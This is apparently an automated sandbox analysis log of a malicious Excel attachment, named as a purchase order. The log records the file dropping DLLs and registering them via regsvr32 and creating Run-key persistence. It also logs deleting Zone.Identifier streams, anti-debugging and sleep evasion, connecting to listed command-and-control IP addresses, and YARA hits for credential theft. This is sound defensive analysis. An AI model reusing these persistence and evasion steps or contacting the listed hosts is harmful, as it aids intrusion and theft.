Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: PO0000001552.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\PO0000001552.xls
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{8FCFB94A-FCE6-4E34-A02C-69E8EC3E944A} - OProcSessId.dat
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@11/15@4/59
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B0638E8 CreateWindowExW,RegisterTouchWindow,MessageBoxW,CoCreateInstance,ShowWindow,UpdateWindow, 8_2_00007FFD2B0638E8
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File read: C:\Users\desktop.ini
Source: PO0000001552.xls OLE indicator, Workbook stream: true
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800274F4 FindCloseChangeNotification,Process32FirstW,CreateToolhelp32Snapshot, 8_2_00000001800274F4
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: PO0000001552.xls Initial sample: OLE indicators vbamacros = False
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180005098 push ebp; ret 8_2_0000000180005099
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800118AD push esp; retn 0000h 8_2_00000001800118B5
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800170C8 push eax; retf 8_2_00000001800170C9
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800170DD push ecx; iretd 8_2_00000001800170E2
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000512B push ebp; retf 8_2_000000018000512F
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180004938 push eax; ret 8_2_000000018000493B
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800171F0 push eax; retf 8_2_00000001800171F1
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180010F42 push 8B48E1F7h; retf 8_2_0000000180010F51
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800117D6 pushad ; ret 8_2_00000001800117D8
Source: EvvmhfKiKFhKrSuHfBq[1].dll.0.dr Static PE information: section name: text
Source: o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll.0.dr Static PE information: section name: text
Source: elv2.ooocccxxx.0.dr Static PE information: section name: text
Source: elv3.ooocccxxx.0.dr Static PE information: section name: text
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B072AF0 DecodePointer,_errno,_invalid_parameter_noinfo,LoadLibraryW,GetProcAddress,_errno,GetLastError,_invalid_parameter_noinfo,GetLastError,EncodePointer,FreeLibrary,_errno,_errno, 8_2_00007FFD2B072AF0
Source: elv2.ooocccxxx.0.dr Static PE information: real checksum: 0x6e4a7 should be: 0x7446f
Source: EvvmhfKiKFhKrSuHfBq[1].dll.0.dr Static PE information: real checksum: 0x6e4a7 should be: 0x7446f
Source: elv3.ooocccxxx.0.dr Static PE information: real checksum: 0x6e4a7 should be: 0x72327
Source: o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll.0.dr Static PE information: real checksum: 0x6e4a7 should be: 0x72327
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\elv2.ooocccxxx
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\elv3.ooocccxxx
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\GanZhs\FrugrCuQjdEr.dll (copy)
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\XEzXl\JZazaZgAOY.dll (copy)

Boot Survival

Source: C:\Windows\System32\regsvr32.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dll
Source: C:\Windows\System32\regsvr32.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FrugrCuQjdEr.dll
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\elv2.ooocccxxx
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\elv3.ooocccxxx

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\XEzXl\JZazaZgAOY.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe TID: 6700 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 6880 Thread sleep time: -60000s >= -30000s
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll
Source: C:\Windows\System32\regsvr32.exe API coverage: 9.8 %
Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: regsvr32.exe, 0000000A.00000003.2012380786.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2415264641.0000000000BFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012793437.0000000000BFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066471204.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066014930.00000000009FC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2415830972.0000000000A34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012356542.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066669199.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416016572.0000000000A40000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW&
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B064980 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FFD2B064980
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B072AF0 DecodePointer,_errno,_invalid_parameter_noinfo,LoadLibraryW,GetProcAddress,_errno,GetLastError,_invalid_parameter_noinfo,GetLastError,EncodePointer,FreeLibrary,_errno,_errno, 8_2_00007FFD2B072AF0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B0691F4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FFD2B0691F4

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe Network Connect: 45.63.99.23 7080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 173.255.211.88 443
Source: C:\Windows\System32\regsvr32.exe Network Connect: 182.162.143.56 443
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Code function: GetLastError,free,free,GetLocaleInfoW,GetLocaleInfoW,free,GetLocaleInfoW, 8_2_00007FFD2B072BF4
Source: C:\Windows\System32\regsvr32.exe Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW, 8_2_00007FFD2B077A88
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 8_2_00007FFD2B0779F8
Source: C:\Windows\System32\regsvr32.exe Code function: _getptd,GetLocaleInfoA, 8_2_00007FFD2B077910
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesA, 8_2_00007FFD2B077F60
Source: C:\Windows\System32\regsvr32.exe Code function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,GetLocaleInfoW,GetLocaleInfoW,GetACP,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s, 8_2_00007FFD2B077FCC
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 8_2_00007FFD2B0777EC
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesA, 8_2_00007FFD2B077E88
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesA, 8_2_00007FFD2B077EC8
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free, 8_2_00007FFD2B078470
Source: C:\Windows\System32\regsvr32.exe Code function: _getptd,GetLocaleInfoA,GetLocaleInfoW, 8_2_00007FFD2B077D58
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B068C48 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 8_2_00007FFD2B068C48
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B0675D0 HeapCreate,GetVersion,HeapSetInformation, 8_2_00007FFD2B0675D0

Stealing of Sensitive Information

Source: Yara match File source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2414500170.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY